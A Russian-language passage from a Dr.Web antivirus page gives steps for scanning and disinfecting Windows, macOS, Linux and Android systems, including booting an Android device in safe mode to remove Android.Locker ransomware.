  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке